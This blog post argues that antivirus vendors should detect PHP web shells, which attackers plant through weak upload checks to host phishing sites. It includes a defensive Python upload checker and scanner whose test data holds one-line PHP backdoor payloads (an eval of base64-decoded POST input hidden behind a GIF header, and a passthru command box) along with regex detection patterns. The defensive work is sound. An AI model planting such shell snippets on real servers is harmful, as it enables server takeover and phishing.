Over the course of examining hundreds if not thousands of phishing sites, I’ve learned that the vast majority are created by compromising legitimate web sites through vulnerabilities of one type or another. Most often the vulnerability is a web application that doesn’t properly check that user-supplied content is really just user content. For example, instead of uploading an avatar image to an online forum like ZeroBoard, hackers upload malicious files which they can then run on the server, giving them access to the system. The application does a poor job (if any) of checking that the picture file is only a picture file.
The most often uploaded malicious files are PHP shells. A PHP shell is a PHP program which provides a hacker with access to the web server as well as many tools and features:
- Find, Edit, Rename, Download Files
- Point-and-click Directory and File Navigator
- Shell Command Execution
- PHP Statement Evaluation
- Find Vulnerable Files and Directories
- Upload / Download files from FTP Servers
- Dump MySQL Databases
- Create a proxy server
- Create a back-connect shell
- Encode / Decode Base64, URL escape encoding, etc.
- Show running processes, system name, kernel version, IP addresses, etc.
- Show PHP configuration (php.ini), safe-mode, register globals, etc.
- FTP brute-force password cracker
- Emailer (spammer)
- Self-update and self-remove
The most common PHP shells are the C99 shell from the Captain Crunch Security Team and the r57 shell from the Rush Security Team / GHC. However, some PHP shells are simple one-box forms used to enter a command which will be executed on the server.
Because PHP shells make hacking easy and phish kits are freely available, even ‘ankle-biters’ can create phishing sites. In fact, most phishing is done by criminals with only mediocre computer skills. This is unfortunate because it makes the problem seem bigger than it is and limits our ability to focus on the really bad actors. Those of us wearing the white hats need to find solutions that ensure only skilled cyber-criminals are able to attempt scams like phishing.
One possible solution is to detect and stop malicious programs like PHP shells on web sites. Perhaps anti-virus products could be used to detect malicious files like PHP shells. Then, if web hosting companies used these anti-virus products on their servers, there would be less phishing. Of course it wouldn’t stop the problem altogether, but if we can make the ‘script kiddies’ that use PHP shells go away, we can stop a lot of phishing and focus on the really, really bad guys.
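Both halves of the argument above can be shown in a defender’s tool: the missing upload check (is this ‘avatar’ really just an image?) and a heuristic scan for the one-box command shells and eval/base64 payloads that characterise PHP backdoors. The following is an added example written for this post, not code from ZeroBoard or from any of the scanners tested; the indicator weights, the threshold and the sample files are my own constructions.

```python
import re

# Magic bytes for the image formats an avatar upload should accept.
IMAGE_MAGIC = {b"\x89PNG\r\n\x1a\n": "png", b"\xff\xd8\xff": "jpeg",
               b"GIF87a": "gif", b"GIF89a": "gif"}
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)

# Heuristic indicators typical of PHP shells, weighted by how specific they are
# (weights are an assumption for this example): request input fed straight into
# command or code execution, decoded payloads passed to eval, known shell strings.
INDICATORS = [
    (rb"\b(eval|assert)\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(", 5, "eval of decoded payload"),
    (rb"\b(system|passthru|shell_exec|exec|popen|proc_open)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b", 5,
     "request parameter executed as command"),
    (rb"\$_(GET|POST|REQUEST|COOKIE)\[[^\]]*\]\s*\(", 4, "request parameter called as function"),
    (rb"\b(system|passthru|shell_exec|exec|popen|proc_open)\s*\(", 2, "command execution"),
    (rb"\bbase64_decode\s*\(", 1, "base64 decoding"),
    (rb"c99shell|r57shell|back.?connect|safe_mode", 2, "known shell strings"),
]

def check_image_upload(data: bytes) -> tuple[bool, str]:
    """Accept an 'avatar' only if its header is a real image AND it carries no PHP open
    tag: a valid GIF header does not make appended PHP harmless if the server runs it."""
    kind = next((k for magic, k in IMAGE_MAGIC.items() if data.startswith(magic)), None)
    if kind is None:
        return False, "header is not a supported image format"
    if PHP_TAG.search(data):
        return False, f"{kind} header but embedded PHP open tag"
    return True, kind

def score_php_source(src: bytes) -> tuple[int, list[str]]:
    """Sum the weights of all indicators present; 5 or more is worth a human look."""
    score, hits = 0, []
    for pattern, weight, label in INDICATORS:
        if re.search(pattern, src, re.IGNORECASE):
            score += weight
            hits.append(label)
    return score, hits

# Constructed samples standing in for captured files: a clean avatar, an image header
# with PHP appended, a one-box command shell, and an ordinary forum config script.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SAMPLE_POLYGLOT = b"GIF89a" + b"\x00" * 8 + b"<?php eval(base64_decode($_POST['c'])); ?>"
SAMPLE_ONEBOX = b"<?php if(isset($_REQUEST['cmd'])){echo '<pre>';passthru($_REQUEST['cmd']);} ?>"
SAMPLE_CLEAN = b"<?php $db = mysql_connect('localhost', 'forum', 'pw'); ?>"

if __name__ == "__main__":
    for name, data in [("png", SAMPLE_PNG), ("polyglot", SAMPLE_POLYGLOT)]:
        print(name, check_image_upload(data))
    for name, src in [("onebox", SAMPLE_ONEBOX), ("clean", SAMPLE_CLEAN)]:
        print(name, score_php_source(src))
```

A hosting company could run `score_php_source` over every `.php` file in a web root and review anything scoring 5 or more; the image check belongs in the forum’s upload handler, before the file ever touches the document root.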
So do anti-virus products detect PHP shells and other hacker backdoors? It turns out that some of them do, with, not surprisingly, varying detection rates. It’s ironic that security vendors spend a huge amount of time and money seeking out every phishing site so that it can be included in blacklists, and collecting every piece of Windows malware that’s out there, yet they don’t execute well on preventing hackers from carrying out the attacks that lead to more phishing and malware.
I decided to test anti-virus products against some PHP shells and backdoors and see exactly how they fare. I started out by collecting PHP shells and backdoors from compromised systems. The files gathered were found ‘in the wild’ and weren’t created by me or by others as proof-of-concepts. Next I submitted them to an anti-virus scanning system similar to VirusTotal, built by Andreas Marx and av-test.org. Note that Andreas and av-test.org did not otherwise participate in this test in any way except by allowing me to use their multi-vendor scanner. Ultimately 99 malicious PHP files were scanned by 29 anti-virus scanners, plus 6 more cases where beta signatures were used.
The results are a bit disheartening, but there are some caveats worth mentioning:
Not all vendors have a Linux based product. Almost always (but not quite), the compromised system which has a PHP shell installed on it is running a version of Linux. So it’s perfectly reasonable not to detect files that generally are only used on an operating system on which your product doesn’t run.
Some anti-virus products are geared as gateway products and not file scanners. That means that some of them might detect the HTML generated by these backdoors, identify it as an unwanted web application, and block access to the PHP shell. That’s easy enough to test, but wasn’t tested here.
Some of the PHP programs could be considered dual-use applications – used for evil or for good. That argument is somewhat constrained by the fact that the tested files were all from compromised web sites and nearly all were made by hackers for hackers.
Another argument is that it’s more important to focus resources on catching desktop malware. I disagree. Server compromises often lead to more desktop malware, more end-user phishing, and more distribution of spam. If every web site on the Internet were secure, almost all of the badness we see every day on the Internet would go away.
So how about it anti-virus vendors! Time to start detecting PHP backdoors?